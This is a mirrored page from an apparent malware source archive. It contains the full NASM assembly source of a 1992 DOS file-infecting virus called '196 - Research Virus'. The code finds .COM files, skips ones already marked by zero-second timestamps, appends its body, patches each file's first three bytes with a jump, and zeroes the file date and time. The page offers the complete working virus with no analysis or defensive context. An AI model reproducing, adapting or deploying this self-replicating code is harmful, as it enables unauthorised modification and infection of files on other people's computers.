mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
152 lines
6.4 KiB
NASM
152 lines
6.4 KiB
NASM
;***************************************************************************
|
||
;* *
|
||
;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
|
||
;* *
|
||
;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) *
|
||
;* *
|
||
;* Non-Overwriting Version of 97 Virus *
|
||
;* *
|
||
;***************************************************************************
|
||
|
||
CODE Segment
|
||
Assume CS:CODE
|
||
|
||
progr equ 100h
|
||
|
||
org progr
|
||
|
||
virus_size EQU vir_end-vir_start
|
||
variable_diff EQU variables_start-next_byte
|
||
|
||
highlander:
|
||
call vir_start ;call virus
|
||
mov ah,4ch ;return to operating system
|
||
int 21h ;thru' dos interrupt 21h
|
||
|
||
vir_start:
|
||
call next_byte ;call next address
|
||
|
||
next_byte:
|
||
pop ax ;get virus address
|
||
pop di ;get program start address
|
||
push ax ;save virus address
|
||
|
||
pop si ;get address of next_byte
|
||
mov ax,variable_diff ;add difference
|
||
add si,ax ;get variables address
|
||
|
||
mov ax,3 ;move to old address
|
||
sub di,ax ;start of .com file
|
||
add si,ax ;point to old code
|
||
mov ax,[si] ;get two bytes from old code
|
||
mov [di],ax ;and place at start of file
|
||
inc si ;increment to third byte
|
||
inc si ;
|
||
inc di ;increment to third address to save
|
||
inc di ;
|
||
mov al,[si] ;get last byte of old code
|
||
mov [di],al ;and place at start of .COM file
|
||
mov ax,5 ;five bytes out
|
||
sub si,ax ;back to start of variables
|
||
|
||
mov di,si ;which is copied to destination
|
||
mov ax,6 ;add 6 to variables address
|
||
add di,ax ;and save file control block
|
||
|
||
;search for first
|
||
mov ah,4eh ;search for first
|
||
xor cx,cx ;attributes to search
|
||
mov dx,di ;point to fcb
|
||
int 21h ;call dos
|
||
jc return_to_prog ;if no file found return to program
|
||
|
||
found_one:
|
||
mov ah,2fh ;get DTA address into es:bx
|
||
int 21h ;call dos
|
||
mov ax,22 ;jump over to time
|
||
add bx,ax ;and point to it
|
||
mov al,es:[bx] ;and place in ax
|
||
and al,00000111b ;get seconds only
|
||
cmp al,00h ;zero seconds?
|
||
jnz infect_program ;if not infect program
|
||
mov ah,4fh ;find next file
|
||
int 21h ;call dos
|
||
jmp short found_one ;jump back
|
||
|
||
infect_program:
|
||
mov ax,8 ;jump to asciiz fcb
|
||
add ax,bx ;add to bx
|
||
mov dx,ax ;and move to dx
|
||
mov ax,3d02h ;open file for writing
|
||
int 21h ;call dos
|
||
jnc continue ;continue if no error
|
||
|
||
mov ah,4fh ;search for next
|
||
xor cx,cx ;attributes to search
|
||
int 21h ;call dos
|
||
jc return_to_prog ;if no file found return to program
|
||
jmp short found_one ;jump forward if one found
|
||
|
||
continue:
|
||
mov bx,ax ;transfer file handle to bx
|
||
|
||
;read first three bytes
|
||
mov ah,3fh ;read file
|
||
mov cx,3 ;number of bytes to read
|
||
mov dx,3 ;three bytes to old_code
|
||
add dx,si ;point to buffer to read
|
||
int 21h ;call dos
|
||
|
||
mov ax,4202h ;move file pointer to end of file
|
||
xor cx,cx ;clear cx
|
||
xor dx,dx ;clear dx
|
||
int 21h ;call dos
|
||
dec ax ;decrement ax
|
||
dec ax ;
|
||
dec ax ;
|
||
dec si ;save address
|
||
mov word [si],ax ;and store
|
||
|
||
mov ah,40h ;write to file
|
||
mov cx,virus_size ;set counter to write
|
||
mov dx,offset vir_start ;point to buffer to start
|
||
int 21h ;and write to file
|
||
|
||
mov ax,4200h ;move file pointer to start of file
|
||
xor cx,cx ;clear cx
|
||
xor dx,dx ;clear dx
|
||
int 21h ;call dos
|
||
|
||
mov ah,40h ;write to file
|
||
mov cx,3 ;set counter to write
|
||
inc si ;point to jump address
|
||
mov dx,si ;point to buffer to start
|
||
int 21h ;and write to file
|
||
|
||
mov ax,5701h ;set date & time
|
||
xor cx,cx ;time set to zero
|
||
xor dx,dx ;and date
|
||
int 21h ;and do it
|
||
mov ah,3eh ;close file
|
||
int 21h ;thru' dos
|
||
|
||
return_to_prog:
|
||
mov ah,4ch ;terminate program
|
||
int 21h ;exit to dos
|
||
|
||
variables_start:
|
||
jump_add:
|
||
db 0e8h,0,0
|
||
old_code:
|
||
db 90h,90h,90h
|
||
fcb:
|
||
db "*.COM",0
|
||
variables_end:
|
||
|
||
vir_end:
|
||
|
||
CODE ENDS
|
||
|
||
END highlander
|
||
|
||
|